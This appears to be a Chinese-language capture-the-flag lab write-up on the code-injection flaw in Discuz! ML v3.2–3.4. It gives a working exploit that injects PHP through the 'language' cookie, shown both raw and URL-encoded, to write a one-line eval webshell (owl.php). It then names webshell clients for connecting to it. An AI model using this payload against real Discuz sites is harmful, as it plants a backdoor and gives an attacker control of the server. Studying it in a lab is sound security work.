CMS系列-Discuz
題目URL:http://whalwl.host:8042/forum.php(tips:flag在網站根目錄下)
文章目錄
- CMS系列-Discuz
- 前言
- 一、利用Burp進行抓取資料包
- 二、將資料包發送到Repeater
- 1.構造請求引數驗證漏洞是否存在
- 2.利用Cookie資訊上傳Shell
- 3.可以使用AntSword、Chopper或者Behinder進行連接,這里使用的是AntSword
- 總結
前言
漏洞描述
Discuz ML! V3.X存在代碼注入漏洞,攻擊者通過精心構建的請求報文可以直接執行惡意的PHP代碼,進一步可獲取整個網站的服務器權限,
漏洞影響版本:Discuz!ML v.3.4 、Discuz!ML v.3.2 、Discuz!ML v.3.3 product of codersclub.org
(注意:支持多語言切換可能會有這個漏洞!)
提示:以下是本篇文章正文內容,下面案例可供參考
一、利用Burp進行抓取資料包

二、將資料包發送到Repeater
1.構造請求引數驗證漏洞是否存在

2.利用Cookie資訊上傳Shell
因為cookie欄位中language沒有對引數進行過濾直接拼接從而寫入快取檔案之中,導致快取檔案隨后被加載,從而造成代碼執行,我們可以使用file_put_contents() 函式寫入一句話木馬
‘.file_put_contents(‘owl.php’,urldecode(’<?php eval($_POST["owl"]);?>’)).’
經過URL編碼后為
%27.file_put_contents%28%27owl.php%27%2Curldecode%28%27%253c%253fphp%2520eval%28%2524_%2550%254F%2553%2554%255b%2522owl%2522%255d%29%253b%253f%253e%27%29%29.%27
3.可以使用AntSword、Chopper或者Behinder進行連接,這里使用的是AntSword
發現flag,實驗結束
總結
以上就是今天實驗的內容,本文簡單介紹了CMS系列Discuz ML! V3.X存在代碼注入漏洞,僅供參考!!!
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/299921.html
標籤:其他
上一篇:Web應用安全 -- DVWA部署(Linux、Docker版)
下一篇:簡單網路預警系統設計與實作
